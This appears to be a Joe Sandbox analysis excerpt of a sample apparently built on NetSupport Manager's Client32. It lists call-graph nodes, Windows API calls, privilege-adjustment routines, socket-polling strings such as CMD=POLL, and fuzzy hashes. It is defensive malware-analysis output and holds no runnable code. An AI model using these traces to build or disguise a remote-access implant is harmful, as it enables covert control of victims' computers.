111394bd-111394c6 2151->2158 2155->2156 2182 1113933b 2155->2182 2183 11139353-11139364 GetLastError call 11146450 2156->2183 2184 1113936e-11139375 2156->2184 2157->2158 2166 111394d4 call 111317a0 2158->2166 2167 111394c8-111394cb 2158->2167 2160->2161 2161->2139 2170 111391c2-111391c8 2161->2170 2175 111394d9-111394df 2166->2175 2167->2175 2176 111394cd-111394d2 call 11131870 2167->2176 2170->2139 2180 111391ca-111391cb SetForegroundWindow 2170->2180 2178 111394e5-111394eb 2175->2178 2179 111395e9-111395f4 call 111386b0 2175->2179 2176->2175 2191 111394f1-111394f9 2178->2191 2192 1113959b-111395a3 2178->2192 2204 111395f6-11139608 call 110637c0 2179->2204 2205 11139615-1113961b 2179->2205 2180->2139 2182->2156 2183->2184 2188 11139377-11139392 2184->2188 2189 111393e8 2184->2189 2202 11139395-111393a1 2188->2202 2189->2110 2191->2179 2198 111394ff-11139505 2191->2198 2192->2179 2201 111395a5-111395e3 call 1103f000 call 1103f040 call 1103f060 call 1103f020 call 1110f270 2192->2201 2194->2100 2195->2194 2200 11139284-11139285 SetForegroundWindow 2195->2200 2198->2179 2203 1113950b-11139522 call 1110f420 2198->2203 2200->2194 2201->2179 2209 111393a3-111393b7 call 11081a70 2202->2209 2210 111393bc-111393c9 call 11143230 2202->2210 2223 11139544 2203->2223 2224 11139524-11139542 call 110573b0 2203->2224 2204->2205 2226 1113960a-11139610 call 11142210 2204->2226 2207 11139621-11139628 2205->2207 2208 1113974a-11139752 2205->2208 2207->2208 2215 1113962e-11139647 call 1105dd10 2207->2215 2208->2098 2209->2210 2229 111393b9 2209->2229 2210->2189 2231 111393cb-111393e6 GetLastError call 11146450 2210->2231 2215->2208 2235 1113964d-11139660 2215->2235 2232 11139546-11139592 call 1110f260 call 1104ce00 call 1104e340 call 1104e3b0 call 1104ce40 2223->2232 2224->2232 2226->2205 2229->2210 2231->2117 2232->2179 2266 11139594-11139599 call 110ebf30 2232->2266 2247 11139662-11139668 2235->2247 2248 1113968d-11139693 2235->2248 2251 1113966a-11139688 call 11146450 GetTickCount 2247->2251 2252 11139699-111396a5 GetTickCount 2247->2252 2248->2208 2248->2252 2251->2208 2252->2208 2255 111396ab-111396eb call 11142e80 call 11146ee0 call 11142e80 call 11025bb0 2252->2255 2272 111396f0-111396f5 2255->2272 2266->2179 2272->2272 2273 111396f7-111396fd 2272->2273 2274 11139700-11139705 2273->2274 2274->2274 2275 11139707-11139731 call 1112c7a0 2274->2275 2278 11139733-11139734 FreeLibrary 2275->2278 2279 1113973a-11139747 call 111618c1 2275->2279 2278->2279 2279->2208
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                          • IsWindow.USER32(000404A0), ref: 11139125
                                                                                          • IsWindowVisible.USER32(000404A0), ref: 11139133
                                                                                          • IsWindowVisible.USER32(000404A0), ref: 1113916B
                                                                                          • GetForegroundWindow.USER32 ref: 11139186
                                                                                          • EnableWindow.USER32(000404A0,00000000), ref: 111391A0
                                                                                          • EnableWindow.USER32(000404A0,00000001), ref: 111391BC
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                          • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                          • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                          • IsWindowVisible.USER32(000404A0), ref: 11139248
                                                                                          • IsIconic.USER32(000404A0), ref: 11139255
                                                                                          • GetForegroundWindow.USER32 ref: 1113925F
                                                                                            • Part of subcall function 11131210: ShowWindow.USER32(000404A0,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                            • Part of subcall function 11131210: ShowWindow.USER32(000404A0,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                          • EnableWindow.USER32(000404A0,00000001), ref: 11139294
                                                                                          • GetLastError.KERNEL32 ref: 11139353
                                                                                          • GetLastError.KERNEL32 ref: 111393CB
                                                                                          • GetTickCount.KERNEL32 ref: 11139678
                                                                                          • GetTickCount.KERNEL32 ref: 11139699
                                                                                            • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                          • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                          • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                          • API String ID: 2511061093-2542869446
                                                                                          • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                          • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                          • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                          • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                          APIs
                                                                                          • #16.WSOCK32(00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D924C
                                                                                          • WSAGetLastError.WSOCK32(00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D925B
                                                                                          • GetTickCount.KERNEL32 ref: 6C5D9274
                                                                                          • Sleep.KERNEL32(00000001,00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D92A8
                                                                                          • GetTickCount.KERNEL32 ref: 6C5D92B0
                                                                                          • Sleep.KERNEL32(00000014), ref: 6C5D92BC
                                                                                          Strings
                                                                                          • ReadSocket - Would block, xrefs: 6C5D928A
                                                                                          • ReadSocket - Connection has been closed by peer, xrefs: 6C5D92E0
                                                                                          • *RecvTimeout, xrefs: 6C5D927B
                                                                                          • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C5D9226
                                                                                          • a3^l, xrefs: 6C5D9244
                                                                                          • ReadSocket - Error %d reading response, xrefs: 6C5D92F7
                                                                                          • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6C5D922B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountSleepTick$ErrorLast
                                                                                          • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3^l$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                          • API String ID: 2495545493-3425134272
                                                                                          • Opcode ID: 33e875e09022cfc04a646acb22b40cdd98fc642f8d20e01b6c4bc488a390689e
                                                                                          • Instruction ID: b6b82bb0c7a53810def9def3cfbeb8ec5dc44364cda453f3f9bd56f1836d49ea
                                                                                          • Opcode Fuzzy Hash: 33e875e09022cfc04a646acb22b40cdd98fc642f8d20e01b6c4bc488a390689e
                                                                                          • Instruction Fuzzy Hash: 4F31B175E04308EFDB00DFADDC85B8EB3B4EB85326F014959E909D7E40EB31A9548B99
                                                                                          APIs
                                                                                          • GetSystemTime.KERNEL32(?,?,?,939E354D,1038AB42,939E34B3,FFFFFFFF,00000000), ref: 6C5E31E2
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C60ECB0), ref: 6C5E31EC
                                                                                          • GetSystemTime.KERNEL32(?,1038AB42,939E34B3,FFFFFFFF,00000000), ref: 6C5E322A
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C60ECB0), ref: 6C5E3234
                                                                                          • EnterCriticalSection.KERNEL32(6C61B898,?,939E354D), ref: 6C5E32BE
                                                                                          • LeaveCriticalSection.KERNEL32(6C61B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C5E32D3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C5E334D
                                                                                            • Part of subcall function 6C5EBA20: __strdup.LIBCMT ref: 6C5EBA3A
                                                                                            • Part of subcall function 6C5EBB00: _free.LIBCMT ref: 6C5EBB2D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                          • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                          • API String ID: 1510130979-3441452530
                                                                                          • Opcode ID: 4b614711c9917101a9c2084e4b2f08b331ea9d62280805306bc76c0680d4c0c3
                                                                                          • Instruction ID: af380195d1e21f30bdfc9e1bba848f2f398b1c5eec60eda308c213ca68385834
                                                                                          • Opcode Fuzzy Hash: 4b614711c9917101a9c2084e4b2f08b331ea9d62280805306bc76c0680d4c0c3
                                                                                          • Instruction Fuzzy Hash: AC617472904208EFCB14DFA8DC85EDEB7B9FF89305F14451AE416A3B50EB34A908CB55
                                                                                          APIs
                                                                                          • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                          • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                          • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                          • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                          • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                          • String ID: SHELL32.DLL$SHGetSettings
                                                                                          • API String ID: 4195908086-2348320231
                                                                                          • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                          • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                          • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                          • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _memset
                                                                                          • String ID: NBCTL32.DLL$_License$serial_no
                                                                                          • API String ID: 2102423945-35127696
                                                                                          • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                          • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                          • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                          • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID: Client32$NSMWClass$NSMWClass
                                                                                          • API String ID: 3192549508-611217420
                                                                                          • Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                          • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                          • Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                          • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                          APIs
                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0106F958,0106F958,0106F958,0106F958,0106F958,0106F958,0106F958,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                          • EqualSid.ADVAPI32(?,0106F958,?,00000001,00000001), ref: 1109E9A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InformationToken$AllocateEqualInitialize
                                                                                          • String ID:
                                                                                          • API String ID: 1878589025-0
                                                                                          • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                          • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                          • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                          • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,F3EE1E80,00080000,00000000,00000000), ref: 1109D46D
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                          • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                          • String ID:
                                                                                          • API String ID: 2349140579-0
                                                                                          • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                          • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                          • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                          • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                          • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 81990902-0
                                                                                          • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                          • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                          • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                          • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                          APIs
                                                                                            • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                          • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                            • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
